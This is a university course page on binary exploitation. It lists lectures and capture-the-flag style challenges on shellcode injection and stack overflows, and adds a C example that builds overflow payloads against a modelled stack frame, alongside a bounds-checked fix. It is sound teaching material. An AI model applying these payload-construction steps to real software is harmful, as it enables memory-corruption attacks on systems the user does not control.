Binary Exploitation


CSE 365 - Spring 2024

Now let's put everything together and learn how to exploit binaries.


Lectures and Reading

Recorded Lectures:

11/22/23 Binary Security Pt. 1

11/27/23 Binary Security Pt. 2

11/29/23 Binary Security Pt. 3

The excellent Zardus (creator of pwn.college) has recorded lectures and slides that might be useful:

Shellcode Injection: Introduction

Shellcode Injection: Common Challenges

Shellcode Injection: Data Execution Prevention

Memory Errors: Introduction

Memory Errors: High-level Problems

Memory Errors: Smashing the Stack

Memory Errors: Causes of Corruption 1

Memory Errors: ASLR

Memory Errors: Causes of Disclosure

Exploitation Scenarios: Introduction

Exploitation Scenarios: Hijacking to Shellcode


Challenges

Exploit a (memory corruption) stack injection vulnerability

Write and execute shellcode to read the flag!

Write and execute shellcode to read the flag, but a portion of your input is randomly skipped.

Write and execute shellcode to read the flag, but your input is filtered before it is executed.

Overflow a buffer on the stack to set the right conditions to obtain the flag!

Overflow a buffer on the stack to set the right conditions to obtain the flag!

Overflow a buffer on the stack to set trickier conditions to obtain the flag!

Overflow a buffer on the stack to set trickier conditions to obtain the flag!

Overflow a buffer and smash the stack to obtain the flag!

Overflow a buffer and smash the stack to obtain the flag!

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary!

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary!

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary with an additional check on your input.

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary with an additional check on your input.

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Write a full exploit involving shellcode and a method of tricking the challenge into executing it.

Write a full exploit involving shellcode and a method of tricking the challenge into executing it.

Write a full exploit involving injecting shellcode and a method of tricking the challenge into executing it. Note: ASLR is disabled!

Write a full exploit involving injecting shellcode and a method of tricking the challenge into executing it. Note: ASLR is disabled!
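The "set the right conditions" and "smash the stack" levels above all come down to the same payload-construction step: find the distance from the start of the overflowed buffer to the thing you want to overwrite, pad up to it, then write the wanted value in the target's byte order. The following is an added example, not code from the course or from pwn.college. The frame layout (a 32-byte buffer, a checked variable, the saved frame pointer and the return address), the value 0x1337, the addresses 0x401000 and 0x4011d6, and the little-endian x86-64 target are all constructed assumptions; the layout is pinned in a struct so the writes stay well-defined, whereas on a real level the offsets have to be recovered from the disassembly or by watching where an over-long input crashes.

```c
/* Added example (not course or pwn.college code): how an overflow payload is
 * laid out. The frame below is a constructed model pinned in a struct so the
 * writes stay well-defined; on a real target the offsets must be recovered
 * from the disassembly or by observing where a long input crashes. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct frame {
    char     buf[32];    /* fixed-size local buffer filled from user input */
    uint32_t win;        /* "right condition": the program checks win == 0x1337 */
    uint64_t saved_rbp;  /* caller's frame pointer (compiler pads before it) */
    uint64_t saved_ret;  /* return address the epilogue will jump to */
};

/* Vulnerable pattern: len bytes are copied with no check against sizeof buf,
 * so input past 32 bytes runs into win and then into the saved registers. */
static void vuln_copy(struct frame *f, const unsigned char *input, size_t len)
{
    memset(f, 0, sizeof *f);
    f->saved_ret = 0x401000;                 /* constructed legitimate return */
    if (len > sizeof *f) len = sizeof *f;    /* keep the model itself in bounds */
    memcpy(f, input, len);                   /* the missing bounds check */
}

/* Hardened form: refuse anything larger than the buffer instead of copying it. */
static int safe_copy(struct frame *f, const unsigned char *input, size_t len)
{
    if (len > sizeof f->buf) return -1;
    memcpy(f->buf, input, len);
    return 0;
}

/* Write v as n little-endian bytes (x86-64 byte order; assumed target). */
static void put_le(unsigned char *out, uint64_t v, size_t n)
{
    for (size_t i = 0; i < n; i++) out[i] = (unsigned char)(v >> (8 * i));
}

/* "Set the right conditions" levels: pad up to win, then the wanted value. */
size_t payload_set_win(unsigned char *out, size_t cap, uint32_t value)
{
    size_t off = offsetof(struct frame, win);
    if (cap < off + sizeof value) return 0;
    memset(out, 'A', off);
    put_le(out + off, value, sizeof value);
    return off + sizeof value;
}

/* "Smash the stack" levels: pad through win and saved_rbp, then overwrite
 * saved_ret. The padding also clobbers win, so if a level checks both,
 * place the wanted value at offsetof(struct frame, win) inside the padding.
 * For a PIE binary, target must be base + offset, with base leaked first. */
size_t payload_hijack_ret(unsigned char *out, size_t cap, uint64_t target)
{
    size_t off = offsetof(struct frame, saved_ret);
    if (cap < off + sizeof target) return 0;
    memset(out, 'A', off);
    put_le(out + off, target, sizeof target);
    return off + sizeof target;
}

/* Run each payload against the model and report what it changed. */
uint32_t demo_set_win(void)
{
    unsigned char p[sizeof(struct frame)];
    struct frame f;
    size_t n = payload_set_win(p, sizeof p, 0x1337);
    vuln_copy(&f, p, n);
    return f.win;                            /* 0x1337 */
}

uint64_t demo_hijack_ret(void)
{
    unsigned char p[sizeof(struct frame)];
    struct frame f;
    size_t n = payload_hijack_ret(p, sizeof p, 0x4011d6);
    vuln_copy(&f, p, n);
    return f.saved_ret;                      /* 0x4011d6: now points at "win" */
}

int demo_safe_rejects(void)
{
    unsigned char p[sizeof(struct frame)];
    struct frame f;
    size_t n = payload_set_win(p, sizeof p, 0x1337);
    return safe_copy(&f, p, n);              /* -1: 36 bytes > 32-byte buffer */
}

int main(void)
{
    printf("win after overflow: 0x%x\n", demo_set_win());
    printf("saved_ret after overflow: 0x%llx\n", (unsigned long long)demo_hijack_ret());
    printf("hardened copy result: %d\n", demo_safe_rejects());
    return 0;
}
```

The two payload builders are the part that carries over to the real levels: once the offsets are known, the remaining work is packing the value in the target's byte order and, for the PIE and ASLR-enabled variants, obtaining a leak to turn a file offset into an absolute address before building the payload.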

